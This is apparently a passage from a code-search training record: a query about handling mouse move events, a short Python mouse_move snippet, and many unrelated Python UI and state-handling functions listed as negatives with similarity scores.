self.totalBytes.get():\r\n ok = True\r\n else:\r\n ok = False\r\n else:\r\n ok = False # no file loaded\r\n if ok:\r\n self.startButton.config(state=\"normal\")\r\n else:\r\n self.startButton.config(state=\"disabled\")", "def setup_mode():\n status_label.color = WHITE\n status_label.text = \"-SET-\"\n\n ave_label.color = BLACK # Turn off average label and value display\n ave_value.color = BLACK\n\n max_value.text = str(MAX_RANGE_F) # Display maximum range value\n min_value.text = str(MIN_RANGE_F) # Display minimum range value\n\n time.sleep(0.8) # Show SET status text before setting parameters\n status_label.text = \"\" # Clear status text\n\n param_index = 0 # Reset index of parameter to set\n\n setup_state = \"SETUP\" # Set initial state\n while setup_state == \"SETUP\":\n # Select parameter to set\n setup_state = \"SELECT_PARAM\" # Parameter selection state\n while setup_state == \"SELECT_PARAM\":\n param_index = max(0, min(2, param_index))\n status_label.text = SETUP_COLORS[param_index][0]\n image_group[param_index + 226].color = BLACK\n status_label.color = BLACK\n time.sleep(0.25)\n image_group[param_index + 226].color = SETUP_COLORS[param_index][1]\n status_label.color = WHITE\n time.sleep(0.25)\n\n param_index -= get_joystick()\n\n _buttons = panel.events.get()\n if _buttons and _buttons.pressed:\n if _buttons.key_number == BUTTON_UP: # HOLD button pressed\n param_index = param_index - 1\n if _buttons.key_number == BUTTON_DOWN: # SET button pressed\n param_index = param_index + 1\n if _buttons.key_number == BUTTON_HOLD: # HOLD button pressed\n play_tone(1319, 0.030) # Musical note E6\n setup_state = \"ADJUST_VALUE\" # Next state\n if _buttons.key_number == BUTTON_SET: # SET button pressed\n play_tone(1319, 0.030) # Musical note E6\n setup_state = \"EXIT\" # Next state\n\n # Adjust parameter value\n param_value = int(image_group[param_index + 230].text)\n\n while setup_state == \"ADJUST_VALUE\":\n param_value = max(32, min(157, param_value))\n image_group[param_index + 230].text = str(param_value)\n image_group[param_index + 230].color = BLACK\n status_label.color = BLACK\n time.sleep(0.05)\n image_group[param_index + 230].color = SETUP_COLORS[param_index][1]\n status_label.color = WHITE\n time.sleep(0.2)\n\n param_value += get_joystick()\n\n _buttons = panel.events.get()\n if _buttons and _buttons.pressed:\n if _buttons.key_number == BUTTON_UP: # HOLD button pressed\n param_value = param_value + 1\n if _buttons.key_number == BUTTON_DOWN: # SET button pressed\n param_value = param_value - 1\n if _buttons.key_number == BUTTON_HOLD: # HOLD button pressed\n play_tone(1319, 0.030) # Musical note E6\n setup_state = \"SETUP\" # Next state\n if _buttons.key_number == BUTTON_SET: # SET button pressed\n play_tone(1319, 0.030) # Musical note E6\n setup_state = \"EXIT\" # Next state\n\n # Exit setup process\n status_label.text = \"RESUME\"\n time.sleep(0.5)\n status_label.text = \"\"\n\n # Display average label and value\n ave_label.color = YELLOW\n ave_value.color = YELLOW\n return int(alarm_value.text), int(max_value.text), int(min_value.text)", "def init_state(self):\n self.read_inputs()\n if (self.in_power.value == 1) and (self.in_alert.value == 1):\n self.state = 'alert'\n elif (self.in_power.value == 1):\n self.state = 'on'\n else:\n self.state = 'off'\n self.leave_init()", "def change_mode(self, mode):\r\n self.update_enrollment(mode=mode)", "def currentMode(self, state):\n logger.debug(\"Func: currentMode/setter\")\n\n if not type(state) is bool:\n if bool is 0:\n state = False\n elif bool is 1:\n state = True\n else:\n msg = (\"only boolean or 0-1 accepted, entered %s\" %state)\n logger.error(msg)\n # raise Exception([101, msg])\n self._exception(101, msg)\n return\n self._setCurrents(\"currentMode\", state)", "def _enum_callback(self, *args):\n\t\tnew_value = args[1].get_string()\n\n\t\t# No need to change the state if it's already as the user want.\n\t\t# Cases \"m1 m1\" or \"b1 b1\" or \"b1 m1\" or \"m1 b1\"\n\t\tif new_value == args[0].get_state().get_string():\n\t\t\treturn\n\n\t\t# Actually change the state to the new value.\n\t\targs[0].set_state(GLib.Variant.new_string(new_value))\n\t\tself.window.set_picture_title()\n\t\tself.get_active_pane().hide_options_menu()", "def update(self):\n self._state = 23", "def _on_state_change(\n self, entity: Union[str, dict], attribute: str, old: str, new: str, kwargs: dict\n ) -> None:\n if new == self.properties[CONF_TARGET_STATE]:\n if self.properties.get(CONF_DELAY):\n self.handles[HANDLE_TOGGLE_STATE] = self.run_in(\n self._on_schedule_toggle,\n self.properties[CONF_DELAY],\n state=self.properties[CONF_SWITCH_STATE],\n )\n else:\n self.toggle(state=self.properties[CONF_SWITCH_STATE])\n else:\n if HANDLE_TOGGLE_STATE in self.handles:\n handle = self.handles.pop(HANDLE_TOGGLE_STATE)\n self.cancel_timer(handle)", "def change_player_mode(self):\n\n # Checks if player mode is 'Player vs Player'\n if self.player_mode == 'pvp':\n self.p_mode.configure(text='Player vs CPU')\n self.player_mode = 'pvc'\n self.reset_score()\n self.reset_board()\n\n else:\n self.p_mode.configure(text='Player vs Player')\n self.player_mode = 'pvp'\n self.reset_score()\n self.reset_board()", "def change_modes(self, change_list):\n\t\tprint \"CHG_MODE START\"\n\t\tfor mode_ix in range(0,len(change_list),2):\n\t\t\tsetid_and_index = self.__mode_modesetid(change_list[mode_ix])\n\t\t\tif setid_and_index is not None:\n\t\t\t\tif change_list[mode_ix+1] == True:\n\t\t\t\t\tprint \"Setting Active Set:{0} Index:{1}\".format(setid_and_index[0], setid_and_index[1])\n\t\t\t\t\tself.ms_all[setid_and_index[0]].activate(setid_and_index[1])\n\t\t\t\telif change_list[mode_ix+1] == False:\n\t\t\t\t\tprint \"Setting DEactive Set:{0} Index:{1}\".format(setid_and_index[0], setid_and_index[1])\n\t\t\t\t\tself.ms_all[setid_and_index[0]].deactivate(setid_and_index[1])\n\t\t\t\telse:\n\t\t\t\t\tprint \"Invalid State\"\n\t\tif 'volume' in self.ms_all:\n\t\t\tprint self.ms_all['volume'].active()\n\t\tif 'modecycle1' in self.ms_all:\n\t\t\tprint self.ms_all['modecycle1'].active()\n\t\tprint \"CHG_MODE STOP\"", "def handle_current_mode_received(msg: ReceiveMessage) -> None:\n handle_mode_received(\n msg, CONF_MODE_STATE_TEMPLATE, \"_attr_hvac_mode\", CONF_MODE_LIST\n )", "def _mode_changed(self, index: int):\n if index == 0:\n self.table.setEnabled(False)\n self.table.clearSelection()\n self.name_widget.setEnabled(True)\n self.name_widget.validate_name()\n\n else:\n self.table.setEnabled(True)\n self.name_widget.setEnabled(False)\n\n self.valid_source_signal.emit(False)", "def UpdateData(self, event = None):\n ##NOTE: Will have to change way user's variables are saved if \n ##modes allow users to change these in the future.\n ##Probably by grabbing the oldMode and checking its settings.\n array = {\"JconfSelection\": [self.chJconf,\n self.chJconf.GetStringSelection()],\n \"NameServer\": [self.cbNameServer,\n self.cbNameServer.GetValue()],\n \"Xplorer\": [self.cbXplorer, self.cbXplorer.GetValue()],\n \"Conductor\": [self.cbConductor, self.cbConductor.GetValue()],\n \"DesktopMode\": [self.cbDesktop, self.cbDesktop.GetValue()],\n \"XplorerType\": [self.rbXplorer,\n XPLORER_TYPE_LIST[self.rbXplorer.GetSelection()]]}\n\n for var in array:\n ##if array[var][0].IsEnabled():\n self.state.Edit(var, array[var][1])\n self.React()\n return", "def chooseGamemode(self):\n\n # Set the gamemode when user clicks a radio button\n self.GAME_MODE = self.gamemode_var.get()", "def buttonsChangeState(self, btnState):\n c4d.StatusClear()\n c4d.EventAdd(c4d.EVENT_FORCEREDRAW)\n c4d.DrawViews(\n c4d.DRAWFLAGS_ONLY_ACTIVE_VIEW\n | c4d.DRAWFLAGS_NO_THREAD\n | c4d.DRAWFLAGS_STATICBREAK\n )\n c4d.DrawViews(c4d.EVMSG_CHANGEDSCRIPTMODE)\n c4d.EventAdd(c4d.EVENT_ANIMATE)\n c4d.StatusClear()\n if btnState == False:\n self.main_logo.SetImage(self.img_loading, False)\n self.auto_import_fig_but.SetImage(self.img_btnAutoImportOff_FIG, True)\n self.auto_import_prop_but.SetImage(self.img_btnAutoImportOff_PROP, True)\n self.convert_mat_but.SetImage(self.img_btnConvertMaterialsOff, True)\n self.auto_ik_but.SetImage(self.img_btnAutoIKOff, True)\n\n if btnState == True:\n self.main_logo.SetImage(self.img_d2c4dLogo, True)\n self.auto_import_fig_but.SetImage(self.img_btnAutoImport_FIG, True)\n self.auto_import_prop_but.SetImage(self.img_btnAutoImport_PROP, True)\n self.convert_mat_but.SetImage(self.img_btnConvertMaterials, True)\n self.auto_ik_but.SetImage(self.img_btnAutoIK, True)\n\n try:\n self.main_logo.LayoutChanged()\n self.main_logo.Redraw()\n except:\n print(\"DazToC4D: LayoutChanged skip...\")\n c4d.StatusClear()\n c4d.EventAdd()\n c4d.EventAdd(c4d.EVENT_FORCEREDRAW)\n c4d.DrawViews(\n c4d.DRAWFLAGS_ONLY_ACTIVE_VIEW\n | c4d.DRAWFLAGS_NO_THREAD\n | c4d.DRAWFLAGS_STATICBREAK\n )\n c4d.DrawViews()\n c4d.EventAdd(c4d.EVENT_FORCEREDRAW)\n c4d.DrawViews(c4d.DRAWFLAGS_FORCEFULLREDRAW)\n bc = c4d.BaseContainer()\n c4d.gui.GetInputState(c4d.BFM_INPUT_MOUSE, c4d.BFM_INPUT_CHANNEL, bc)\n return True", "def ChangeMode(self, mode):\n if mode in MODE_DICT:\n self.ImportCover(MODE_DICT[mode], layer = MODE_LAYER)", "def StatusChanged(self, state, info):\n pass", "def on_edit_mode(self, mode):\n self.pre_selected = None\n\n self.app.tool_bar.md_bg_color = self.app.theme_cls.primary_color\n self.app.set_lab_tool_bar()\n self.show_action_bar()", "def state(self, value, duration=None):\n if value in ['off', 'OFF', '0']:\n self.off()\n if value in ['on', 'ON', '1']:\n self.on(duration)", "def change_player_state(self):\n if self.active_player.get() is True:\n # Get game phase and unlock respective buttons?\n # or should game do that\n pass\n else:\n pass\n #self.disable_all_buttons()", "def refreshStates(self):\n # Update the comboboxes\n self.updateLayersComboboxes()\n # Update the edit mode buttons\n self.updateEditState_pairsLayer()\n self.updateEditState_toBendLayer()\n # Update the transformation type\n self.updateTransformationType()", "def updateState(self):\n QtGui.QLineEdit.setText(self, self._state[0])", "def update(self):\n self._is_on = self._is_on", "def update(self):\r\n self._state = self._dev.state", "def change_ops_state(self, state):\n for op_button in self.operators.values():\n op_button['state'] = state", "def change_mode(self):\n return (self.mode + 1) % 2", "def handle_onoff_mode_received(\n msg: ReceiveMessage, template_name: str, attr: str\n ) -> None:\n payload = self.render_template(msg, template_name)\n payload_on: str = self._config[CONF_PAYLOAD_ON]\n payload_off: str = self._config[CONF_PAYLOAD_OFF]\n\n if payload == \"True\":\n payload = payload_on\n elif payload == \"False\":\n payload = payload_off\n\n if payload == payload_on:\n setattr(self, attr, True)\n elif payload == payload_off:\n setattr(self, attr, False)\n else:\n _LOGGER.error(\"Invalid %s mode: %s\", attr, payload)\n\n get_mqtt_data(self.hass).state_write_requests.write_state_request(self)", "def opt_statechange(self, opt, new_state):\n self.opt_dict[opt]['enabled'] = new_state", "def btnState(self, box):\n if box.text() == \"Log to File\":\n if box.isChecked():\n self.stdoutBox.setChecked(False)\n # should not edit filename\n self.logfileEdit.setReadOnly(False)\n self.debugStatements = True\n self.switchDebugOutput()\n\n if box.text() == \"Log to Stdout\":\n if box.isChecked():\n self.fileBox.setChecked(False)\n self.logfileEdit.setReadOnly(True)\n self.debugStatements = False\n self.switchDebugOutput()", "def update_state(self, act):\n\n # check the checkbox logic\n if act in ['follow', 'not_follow', 'locate', 'not_locate']:\n self.check_locate_follow_logic(act)\n # test/record logic\n print(\"update function not implemented\")", "def React(self):\n ##Disable DesktopMode if Xplorer & Conductor == False\n #self.state.React(self.state.GetSurface(\"Xplorer\") == False and\n # self.state.GetSurface(\"Conductor\") == False,\n # \"DesktopMode\", False)\n if self.state.GetSurface(\"DesktopMode\"):\n self.rbXplorer.SetSelection(0)\n \n \n self.UpdateDisplay()\n return", "def react(self):\n if self.flag == 0:\n self.state.set(\"SIMULATING\")\n self.flag = 1\n self.simulate()\n else:\n self.state.set(\"AT REST\")\n self.flag = 0", "def changeState(self, node, name, state):", "def updateState(self):\n QtGui.QLabel.setText(self, self._state[0])", "def set_mode(self, mode):\n if mode in self.MODES:\n self.mode = self.MODES[mode]", "def updateState(self):\n self.state = self.microgridPolicy.computeState();", "def state(self):\n raise NotImplementedError", "def state_choose_enter(cfg, app, win):", "def update_status_fields(self, *args):\n\n self.connection_status = 'Connection established' if self.ml_interface.is_connected else ('Debug' if self.debug == True else 'Disconnected')\n\n self.requested_position = self.ml_interface.requested_position\n self.standby_position = self.ml_interface.standby_position\n\n self.rp = self.ml_interface.rp\n\n if self.requested_position is '':\n self.requested_position = '0'\n\n if self.standby_position is '':\n self.standby_position = '0'\n\n if self.settingsWindow.requested_position is '':\n self.settingsWindow.requested_position = '0'\n\n if self.settingsWindow.standby_position is '':\n self.settingsWindow.standby_position = '0'\n\n if int(self.requested_position) > self.settings[\"max_position\"]:\n self.requested_position = str(self.settings[\"max_position\"])\n self.set_requested_position()\n\n if int(self.standby_position) > self.settings[\"max_position\"]:\n self.standby_position = str(self.settings[\"max_position\"])\n self.set_standby_position()\n\n if int(self.rp) >= int(self.requested_position) and self.inserted == 0:\n self.inserted = 1\n\n if(self.trigger == 'Pressed'):\n self.trig = not self.trig\n state = int(float(self.ml_interface.current_state))\n self.current_state = 'Standby' if state == 4 else ('Stopped'if state == 3 else ('Moving' if state == 2 else ('Inserted' if state == 1 else 'Retracted')))\n self.gatan_in_msg = 'Yes' if self.ml_interface.gatan_in else 'No'\n self.gatan_veto_msg = 'Yes' if self.ml_interface.gatan_veto else 'No'\n\n if int(self.settingsWindow.requested_position) > self.settings[\"max_position\"]:\n self.settingsWindow.requested_position = str(self.settings[\"max_position\"])\n\n if int(self.settingsWindow.standby_position) > self.settings[\"max_position\"]:\n self.settingsWindow.standby_position = str(self.settings[\"max_position\"])\n\n # Called last\n self._rp = self.rp", "def state_capture_do(cfg, app, win, events):", "def cb_mode_indicator(data, item, window):\n return mode" ]
[ "0.73479813", "0.7155198", "0.7146986", "0.69878197", "0.696421", "0.6945815", "0.69330287", "0.6821973", "0.67742443", "0.6771602", "0.67632943", "0.6735988", "0.67205477", "0.67016745", "0.6662783", "0.66435605", "0.6638601", "0.6633751", "0.6633751", "0.66132015", "0.66063476", "0.6585536", "0.6563236", "0.65570396", "0.6538978", "0.64908653", "0.6485233", "0.6463719", "0.64626956", "0.64322704", "0.64111805", "0.64092976", "0.6404374", "0.63963574", "0.6393677", "0.63926715", "0.6387331", "0.63489324", "0.6311325", "0.63041836", "0.6279442", "0.6271651", "0.62710893", "0.6240031", "0.62254727", "0.6224556", "0.6216838", "0.6211417", "0.6179707", "0.616119", "0.6160093", "0.6149787", "0.6137926", "0.6129301", "0.61241853", "0.6123655", "0.6086448", "0.6075143", "0.6064592", "0.60471094", "0.6043027", "0.6036841", "0.60284346", "0.6020503", "0.60201234", "0.60152483", "0.601507", "0.6014981", "0.60144633", "0.6014075", "0.6013856", "0.6004084", "0.60026824", "0.59893996", "0.5982343", "0.59787434", "0.5958687", "0.59531", "0.5944429", "0.594291", "0.59252155", "0.5924873", "0.5920115", "0.5903082", "0.58936495", "0.5880534", "0.5867622", "0.5865005", "0.58600634", "0.58590984", "0.58577675", "0.5855859", "0.58535254", "0.585103", "0.5851022", "0.5850323", "0.5841533", "0.58389753", "0.5830437", "0.5822493", "0.5820103" ]
0.0
-1
Mouse move events will be sent here whenever they change to update the UI if neccesary
def mouse_move(self, pos): if (self.setup_type == "position"): x, y = pos self.canvas.move(x, y)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def on_mouse_move(self, event: PointEvent):\n self.x = event.x\n self.y = event.y\n self.handle_mouse(self.x, self.y)", "def mouse_move_callback(self, event):\n # TODO drag and drop figuriek\n print(\"moving at \", event.x + self.offset_x, event.y + self.offset_y)", "def _onmove(self, event):", "def on_mouse_move(self, event):\n self.mouse = [event.xdata, event.ydata]\n\n # Update pan view on mouse move\n if self.panning is True:\n for a in self.pan_axes:\n a.drag_pan(1, event.key, event.x, event.y)\n\n # Async re-draw (redraws only on thread idle state, uses timer on backend)\n self.canvas.draw_idle()\n\n ##### Temporary place-holder for cached update #####\n self.update_screen_request.emit([0, 0, 0, 0, 0])", "def ev_MOUSEMOTION(self, event):", "def update(self):\n self.mousePos = pygame.mouse.get_pos()\n self.update_button_hover_status()", "def on_mouse_motion(self, x, y, delta_x, delta_y):\r\n pass", "def ev_mousemotion(self, event: MouseMotion) -> None:", "def on_mouse_move(self, event):\n if event.is_dragging and event.buttons[0] == 1:\n x0, y0 = event.last_event.pos[0], event.last_event.pos[1]\n x1, y1 = event.pos[0], event.pos[1]\n X0, Y0, Z0 = self.pixel_to_coords(float(x0), float(y0))\n X1, Y1, Z1 = self.pixel_to_coords(float(x1), float(y1))\n self.translate_center(X1 - X0, Y1 - Y0, Z1 - Z0)", "def mouseMoveEvent(self, event):\n if self.view_state.tracking == TrackingMode.FREE and event.buttons() == QtCore.Qt.LeftButton:\n # Calculate the change in mouse position.\n new_mouse_pos = np.array([event.x(), event.y()])\n mouse_delta = new_mouse_pos - self.view_state.mouse\n\n # Add this to the view centre.\n self.view_state.centre = self.view_state.centre - mouse_delta * (1 / self.view_state.scale)\n self.view_state.mouse = new_mouse_pos", "def on_mouse_move(self, win, xpos, ypos):\n old = self.mouse\n self.mouse = (xpos, glfw.get_window_size(win)[1] - ypos)\n if glfw.get_mouse_button(win, glfw.MOUSE_BUTTON_LEFT):\n self.drag(old, self.mouse, glfw.get_window_size(win))\n if glfw.get_mouse_button(win, glfw.MOUSE_BUTTON_RIGHT):\n self.pan(old, self.mouse)", "def on_mouse_move(self, win, xpos, ypos):\n old = self.mouse\n self.mouse = (xpos, glfw.get_window_size(win)[1] - ypos)\n if glfw.get_mouse_button(win, glfw.MOUSE_BUTTON_LEFT):\n self.drag(old, self.mouse, glfw.get_window_size(win))\n if glfw.get_mouse_button(win, glfw.MOUSE_BUTTON_RIGHT):\n self.pan(old, self.mouse)", "def handle_mouse(obj, event):\n if event:\n x = event.globalX()\n y = event.globalY()\n x_w = obj.offset.x()\n y_w = obj.offset.y()\n obj.move(x - x_w, y - y_w)", "def mouseMoveEvent(self, event: 'QGraphicsSceneMouseEvent'):\n new_cursor_position = event.scenePos() # mouse cursor in scene coordinates\n old_cursor_position = event.lastScenePos()\n offset_x = new_cursor_position.x() - old_cursor_position.x()\n offset_y = new_cursor_position.y() - old_cursor_position.y()\n if self.move_all is False:\n \"\"\"Update single disk\"\"\"\n old_top_left_corner = self.scenePos()\n new_top_left_corner_x = offset_x + old_top_left_corner.x()\n new_top_left_corner_y = offset_y + old_top_left_corner.y()\n self.setPos(QPointF(new_top_left_corner_x, new_top_left_corner_y)) # update disk top left corner\n else:\n \"\"\"Call parent to update everybody\"\"\"\n self.parentItem().move_everybody(offset_x, offset_y)", "def mouseMoveEvent(self, event):\n self.end = event.pos()\n self.update()", "def update(self):\n # Get the current mouse position. This returns the position\n # as a list of two numbers.\n pos = pygame.mouse.get_pos()\n\n # Set the player x position to the mouse x position\n self.rect.x = pos[0]", "def on_mouse_motion(self, x, y, delta_x, delta_y):\n \n pass", "def update(self):\n # Get the current mouse position. This returns the position\n # as a list of two numbers.\n pos = pygame.mouse.get_pos()\n \n # Set the player x position to the mouse x position\n self.rect.x = pos[0]", "def mousePosition(self):", "def OnMouseMotion(self, evt):\n if evt.Dragging() and evt.LeftIsDown():\n self.lastx, self.lasty = self.x, self.y\n self.x, self.y = evt.GetPosition()\n self.Refresh(False)", "def _motion(self, event):\n if self.current:\n # modify the current line by changing the end coordinates\n # to be the current mouse position\n coords = event.widget.coords(self.current)\n coords[2] = event.x\n coords[3] = event.y\n\n event.widget.coords(self.current, *coords)", "def mouseMoveEvent(self, event):\n # super(PlotWidget, self).mouseMoveEvent(event)\n event.accept()", "def mouseMoveEvent(self, event):\r\n start = QtCore.QPointF(self.mapToScene(self._start))\r\n end = QtCore.QPointF(self.mapToScene(event.pos())) \r\n \r\n w = abs((end.x() - start.x()))\r\n h = abs((end.y() - start.y())) \r\n \r\n x = (start.x() + end.x())/2\r\n y = (start.y() + end.y())/2 \r\n \r\n lcx = x - (w/2)\r\n lcy = y - (h/2) \r\n \r\n if self.editRegen:\r\n self._currentBox.setRect(lcx,lcy,w,h)\r\n self.updateSceneDataInCamraSpace()\r\n \r\n if self.itemMovable:\r\n self.updateSceneDataInCamraSpace()\r\n \r\n super(MocapGraphicsView, self).mouseMoveEvent(event)", "def ev_windowmoved(self, event: WindowMoved) -> None:", "def mouseMoveEvent (self, event):\n self.itemMoved = True\n super(DiagramItem, self).mouseMoveEvent(event)", "def _updateOnMouseState(self, state):\n x = state.X.abs\n y = state.Y.abs\n \n mscale = self.mouse_icon.getScale() \n \n if (x + mscale[0] + self.mouse_offset) > render_engine.Window.width:\n x = x - mscale[0] - 10\n else:\n x += self.mouse_offset\n \n if (y + mscale[1] + self.mouse_offset) > render_engine.Window.height:\n y = y - mscale[1] - 10\n else:\n y += self.mouse_offset\n \n self.mouse_icon.setPosition((x, y))", "def onMove(self, event):\n\n # get current mouse position\n (x, y) = event.GetPositionTuple()\n\n self.handleMousePositionCallback((x, y))\n\n if event.Dragging() and event.LeftIsDown():\n # are we doing box select?\n if self.is_box_select:\n # set select box point 2 at mouse position\n (self.sbox_w, self.sbox_h) = (x - self.sbox_1_x,\n y - self.sbox_1_y)\n elif not self.last_drag_x is None:\n # no, just a map drag\n self.was_dragging = True\n dx = self.last_drag_x - x\n dy = self.last_drag_y - y\n\n # move the map in the view\n self.view_offset_x += dx\n self.view_offset_y += dy\n\n # limit drag at edges of map\n if self.map_width > self.view_width:\n # if map > view, don't allow edge to show background\n if self.view_offset_x < 0:\n self.view_offset_x = 0\n elif self.view_offset_x > self.max_x_offset:\n self.view_offset_x = self.max_x_offset\n else:\n # else map < view, centre X\n self.view_offset_x = (self.map_width - self.view_width)/2\n\n if self.map_height > self.view_height:\n # if map > view, don't allow edge to show background\n if self.view_offset_y < 0:\n self.view_offset_y = 0\n elif self.view_offset_y > self.max_y_offset:\n self.view_offset_y = self.max_y_offset\n else:\n # else map < view, centre Y\n self.view_offset_y = (self.map_height - self.view_height)/2\n\n # adjust remembered X,Y\n self.last_drag_x = x\n self.last_drag_y = y\n\n self.recalc_view_lonlat_limits()\n\n # redraw client area\n self.drawTilesLayers()", "def _on_canvas_mouse(self, event):\n if event.GetEventType() in [wx.wxEVT_MOTION, wx.wxEVT_LEFT_DOWN, \n wx.wxEVT_LEFT_UP, wx.wxEVT_MOTION|wx.wxEVT_LEFT_DOWN]:\n new_event = wx.MouseEvent(event.GetEventType())\n pos = self.tc.ScreenToClient(wx.GetMousePosition())\n new_event.SetPosition(pos)\n new_event.Skip()\n self.tc.GetEventHandler().ProcessEvent(new_event)", "def mouseMoveEvent(self, e):\r\n \r\n self.label.setText('mouseMoveEvent')", "def OnMouse(self, event):\n\n self.Refresh()\n event.Skip()", "def setupEventHooks(self):\n # handle mouse clicks\n self.img.scene().sigMouseClicked.connect(self.handleClick)\n # handle mouse movement\n # Use signalproxy for ratelimiting\n sig = self.img.scene().sigMouseMoved\n self.mvProxy = pqg.SignalProxy(signal=sig, rateLimit=60, slot=self.handleMove)", "def handle_event(self, event):\n if event.type != MOUSEMOTION:\n return\n self.model.slider.left = event.pos[0]", "def movement(self):", "def events(self):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.running = False\n if event.type == pygame.MOUSEBUTTONDOWN:\n self.set_selected(self.mouse_on_grid())\n if self.get_selected() is not None and event.type == pygame.KEYDOWN:\n self.event_seletect_moved(event)\n self.event_cell_update(event)", "def on_mouse_move(self, event):\n\n # self.view = 1 * np.eye(4, dtype=np.float32)\n # self.model = 1 * np.eye(4, dtype=np.float32)\n\n # self.translate -= event.delta[1]\n # self.translate = max(-1, self.translate)\n # print(event.delta[1])\n # print(self.translate)\n # self.view = translate((0, 0, -self.translate))\n # self.game_program['u_view'] = self.view\n # self.game_program['u_size'] = 5 / self.translate\n # self.view = (0.1*self.translate*np.eye(4, dtype=np.float32)) + self.view\n # self.model = (0.1*self.translate*np.eye(4, dtype=np.float32)) + self.model\n # print(self.view)\n\n # self.game_program['u_model'] = self.model\n # self.game_program['u_view'] = self.view\n\n x, y = event.pos\n #print(x, y)\n self.x_offset, self.y_offset = x - self.last_x, - (y - self.last_y)\n self.last_x, self.last_y = x, y\n self.x_offset *= self.sensitivity\n self.y_offset *= self.sensitivity\n\n self.yaw, self.pitch = self.yaw - self.x_offset, self.pitch + self.y_offset\n self.rot_y(self.yaw * np.pi / 180)\n self.rot_x(self.pitch * np.pi / 180)\n\n self.view = np.dot(self.rot_mat_y, self.rot_mat_x)\n self.game_program['u_view'] = self.view\n\n self.update()", "def OnMoveEvent(self, event):\r\n\r\n win_rect = self.GetRect()\r\n\r\n if win_rect == self._last_rect:\r\n return\r\n\r\n # skip the first move event\r\n if self._last_rect.IsEmpty(): \r\n self._last_rect = wx.Rect(*win_rect)\r\n return\r\n \r\n # skip if moving too fast to avoid massive redraws and\r\n # jumping hint windows\r\n if abs(win_rect.x - self._last_rect.x) > 3 or abs(win_rect.y - self._last_rect.y) > 3:\r\n self._last3_rect = wx.Rect(*self._last2_rect)\r\n self._last2_rect = wx.Rect(*self._last_rect)\r\n self._last_rect = wx.Rect(*win_rect)\r\n return\r\n\r\n # prevent frame redocking during resize\r\n if self._last_rect.GetSize() != win_rect.GetSize():\r\n self._last3_rect = wx.Rect(*self._last2_rect)\r\n self._last2_rect = wx.Rect(*self._last_rect)\r\n self._last_rect = wx.Rect(*win_rect)\r\n return\r\n\r\n self._last3_rect = wx.Rect(*self._last2_rect)\r\n self._last2_rect = wx.Rect(*self._last_rect)\r\n self._last_rect = wx.Rect(*win_rect)\r\n\r\n if _VERSION_STRING < \"2.9\":\r\n leftDown = wx.GetMouseState().LeftDown()\r\n else:\r\n leftDown = wx.GetMouseState().LeftIsDown()\r\n\r\n if not leftDown:\r\n return\r\n\r\n if not self._moving: \r\n self.OnMoveStart(event)\r\n self._moving = True\r\n\r\n if self._last3_rect.IsEmpty():\r\n return\r\n\r\n self.OnMoving(event)", "def move( self, event ):\n self.lastMotion = time()\n if self.follow == False: # If the follow flag is not set, motion within the widget will make the ToolTip dissapear\n self.withdraw()\n self.visible = 1\n self.geometry( '+%i+%i' % ( event.x_root+10, event.y_root+10 ) ) # Offset the ToolTip 10x10 pixes southwest of the pointer\n try:\n self.msgVar.set( self.msgFunc() ) # Try to call the message function. Will not change the message if the message function is None or the message function fails\n except:\n pass\n self.after( int( self.delay * 1000 ), self.show )", "def _on_move(self, event):\n\n if not self.button_pressed:\n return\n\n if self.M is None:\n return\n\n x, y = event.xdata, event.ydata\n # In case the mouse is out of bounds.\n if x == None:\n return\n\n dx, dy = x - self.sx, y - self.sy\n x0, x1 = self.get_xlim()\n y0, y1 = self.get_ylim()\n w = (x1-x0)\n h = (y1-y0)\n self.sx, self.sy = x, y\n\n # Rotation\n if self.button_pressed in self._rotate_btn:\n # rotate viewing point\n # get the x and y pixel coords\n if dx == 0 and dy == 0:\n return\n self.elev = art3d.norm_angle(self.elev - (dy/h)*180)\n self.azim = art3d.norm_angle(self.azim - (dx/w)*180)\n self.get_proj()\n self.figure.canvas.draw()\n\n# elif self.button_pressed == 2:\n # pan view\n # project xv,yv,zv -> xw,yw,zw\n # pan\n# pass\n\n # Zoom\n elif self.button_pressed in self._zoom_btn:\n # zoom view\n # hmmm..this needs some help from clipping....\n minx, maxx, miny, maxy, minz, maxz = self.get_w_lims()\n df = 1-((h - dy)/h)\n dx = (maxx-minx)*df\n dy = (maxy-miny)*df\n dz = (maxz-minz)*df\n self.set_xlim3d(minx - dx, maxx + dx)\n self.set_ylim3d(miny - dy, maxy + dy)\n self.set_zlim3d(minz - dz, maxz + dz)\n self.get_proj()\n self.figure.canvas.draw()", "def update(self):\r\n # Get where the mouse is\r\n pos = pygame.mouse.get_pos()\r\n # Set the left side of the player bar to the mouse position\r\n self.rect.x = pos[0]\r\n # Make sure we don't push the player paddle\r\n # off the right side of the screen\r\n if self.rect.x > self.screenwidth - self.width:\r\n self.rect.x = self.screenwidth - self.width", "def mouse_move(self, obj, event):\n last_pos = self.iren.GetLastEventPosition()\n next_pos = self.iren.GetEventPosition()\n last_disp_coords = np.asarray([last_pos[0], last_pos[1], 0])\n next_disp_coords = np.asarray([next_pos[0], next_pos[1], 0])\n last_world_coords = self.display_to_world(last_disp_coords)\n next_world_coords = self.display_to_world(next_disp_coords)\n world_direction = (last_world_coords - next_world_coords)[0]\n\n if world_direction > 0:\n direction = 'forwards'\n elif world_direction < 0:\n direction = 'backwards'\n else:\n direction = 'none'\n\n if self.cone_dir == 'start':\n if direction == 'backwards':\n self.start_base_x += .5\n if self.start_base_x.is_integer():\n ind = str(int(self.start_base_x))\n isvalid = self.gaps.set_dragged_start(ind)\n if isvalid:\n self.ren_win.Render()\n else:\n self.start_base_x -= .5\n return\n\n elif direction == 'forwards':\n if self.start_base_x > 0:\n self.start_base_x -= .5\n if self.start_base_x.is_integer():\n ind = str(int(self.start_base_x))\n self.gaps.set_dragged_start(ind)\n self.ren_win.Render()\n\n if self.cone_dir == 'end':\n if direction == 'backwards':\n if self.end_base_x > 0:\n self.end_base_x -= .5\n if self.end_base_x.is_integer():\n ind = str(int(self.end_base_x))\n self.gaps.set_dragged_end(ind)\n self.ren_win.Render()\n\n elif direction == 'forwards':\n self.end_base_x += .5\n if self.end_base_x.is_integer():\n ind = str(int(self.end_base_x))\n isvalid = self.gaps.set_dragged_end(ind)\n if isvalid:\n self.ren_win.Render()\n else:\n self.end_base_x -= .5\n return", "def move(self, event):\r\n self.lastMotion = time()\r\n # If the follow flag is not set, motion within the\r\n # widget will make the ToolTip disappear\r\n #\r\n if self.follow is False:\r\n 